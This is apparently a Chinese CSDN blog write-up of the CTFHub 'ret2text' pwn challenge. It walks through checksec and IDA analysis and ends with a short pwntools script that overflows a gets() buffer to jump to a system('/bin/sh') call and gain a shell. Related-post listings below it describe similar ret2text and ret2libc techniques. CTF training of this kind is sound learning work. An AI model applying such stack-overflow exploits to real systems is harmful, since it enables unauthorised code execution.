【PWN · ret2text】——[CTFHub]ret2text

已于 2023-05-08 09:03:16 修改
阅读量1.2k 收藏 4
点赞数
分类专栏: 【PWN · Stack】 文章标签: pwn ret2text ctf
于 2023-04-20 17:33:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/130271302
版权

萌新第一阶段自然是了解做题的套路、流程,简单题要多做滴

前言

经典的ret2text流程 

一、checksec查看

 64位程序,什么保护都没有,No canary found——可以栈溢出控制返回

二、IDA反汇编

发现危险函数gets()

 发现存在返回shell的函数secure(),虽然有一系列随机数啦,随机数比较之类的前置判断,不用管他,只要我们溢出返回地址直接指向目标指令的地址就可以成功获取shell

v大小为0x70+栈基指针0x8+返回地址 

 返回哪里呢?直接返回system("/bin/sh")指令的地址。

三、exp编写 

from pwn import *

r=remote('网址',port)

addr=0x4007B8                        #system("/bin/shell")指令地址
payload=b'a'*(0x70+0x8)+p64(addr)    #覆盖v存储、覆盖栈基指针、修改返回地址

r.sendline(payload)                  #发送payload

r.interactive()                      #shell 交互

 然后ls查看有哪些文件,cat flag即可获得flag

总结

蒟蒻在行动!

Mr_Fmnwon
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHUB(PWN)Ret2Text
Rt1Text的博客
02-02 4216
64位没有开启任何保护的Ret2Text
CTFhub-pwn-[ret2text]-writeup
m0_43405474的博客
08-26 1300
关于CTF pwn的简单入门题目,ret2text
[CTFHub] ret2text
最新发布
Lucien_Carr的博客
04-14 527
gets_s(buffer,size)函数:从标准输入中读取数据,size表示的最多读取的数量,在这里是argv,没有定义是多大,所以我们就可以无限的输入。输入超过程序设定的字节数以后,就会发生栈溢出,多出的内容会覆盖返回地址。这个题目中要获得系统的shell,只需要先用垃圾数据填充填满数组的空间,再拼上系统system函数的返回地址就可以。只要我们能控制程序返回到0x4007B8(“/bin/sh”指令的地址),就可以得到系统的shell。我们攻击的目的主要是获得系统的控制权(也就是拿到shell)。
CTFhub 技能树 PWN ret2text Python3 exp
break_cat的博客
11-17 1155
题目链接:https://www.ctfhub.com -> 技能树 -> PWN -> 栈溢出 -> ret2text WP:https://writeup.ctfhub.com/Skill/Pwn/%E6%A0%88%E6%BA%A2%E5%87%BA/eeca3548.html 搜exp的时候发现已经有人写过WP了,于是就Cirl+CV,发现原程序是用Python2写的,我的pwntools环境是Python3,因此程序需要稍作修改。 from pwn import * h
CTFHub 栈溢出 ret2text exp代码
柠檬i的博客
10-09 1927
CTFHub 栈溢出 ret2text exp代码
ret2text
weixin_56301399的博客
07-20 442
第二步还是用反汇编,获取到system函数的地址。由于要完整调用,所以取lea指令的位置0x00000000004007b8,也就是0x4007b8。第一步利用反汇编,查看变量的位置,为[rbp-0x70]。从IDA中可以看出,pwn程序只有这两个用户函数,其他的都是库函数。让返回地址,也就是EIP指向system(‘/bin/sh’)所在语句对应的内存地址就能获得shell。局部变量s是用户可以通过gets()输入的,只要达到特定的长度L,就能覆盖掉黄色的返回地址。......
ctfhub 技能树pwn 栈溢出 ret2text
m0_75234353的博客
03-29 525
看到v4这个变量的缓冲区,我们要把数据溢出到覆盖返回地址,即0x70+8。选中该行,看到下方的地址(4007B8)看到gets危险函数,再点开其中的v4。再shift+f12 直接查看相关字符。可以看到无任何的栈保护。输入:wq 保存退出。
pwn07.ret2syscall例题
11-11
ret2syscall例题
入门pwn题目ret2text
03-26
入门pwn题目ret2text
ret2libc2pwn 入门题
02-11
pwn 入门题
ret2libc1pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
CTFHUB-PWN-ret2text
m0_64180167的博客
04-16 135
然后我们可以开始写payload。下载文件 checksec看看。然后看看shell的地址是多少。放入ida64 查看字符串。然后看看主函数怎么输入。
pwn ret2text
小龙在线
09-12 669
首先把ret2text用IDA打开: 64位ELF文件。 进入main函数,F5反编译,双击vulnerable函数,进入: 发现溢出点。 函数窗口列表,查看success,发现shell: 进入IDA普通视图,双击左侧success函数,查看success地址,是400566。 写pwn exp.py: from pwn import * sh = process("./ret2text") payload = b"a"*0x10 + b"b"*0x8 + p64(0x400566) sh.
PWN基础8:Ret2Text 实例
prettyX的博客
07-12 461
基础知识 1、栈溢出快速确定偏移量: pwndbg cyclic 200 cyclic -l 异常地址 peda pattern create 200 pattern offset 异常地址 2、定位system函数 objdump -t XXX 查看程序中使用到的函数 objdump -d XXX 查看程序中函数的汇编代码 objdump -d -M intel XXX 查看程序中函数的汇编代码,并且汇编代码是intel架构的
CTFhub-pwn-[ret2shellcode]
m0_43405474的博客
08-26 1321
CTFpwn的一个关于ret2shellcode的小练习,来自CTFhub
PWN初体验之ret2text
weixin_43137410的博客
08-04 648
"Hello,World!"的浪漫可能只有直男才懂!
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢出漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印出来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢出漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算出system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值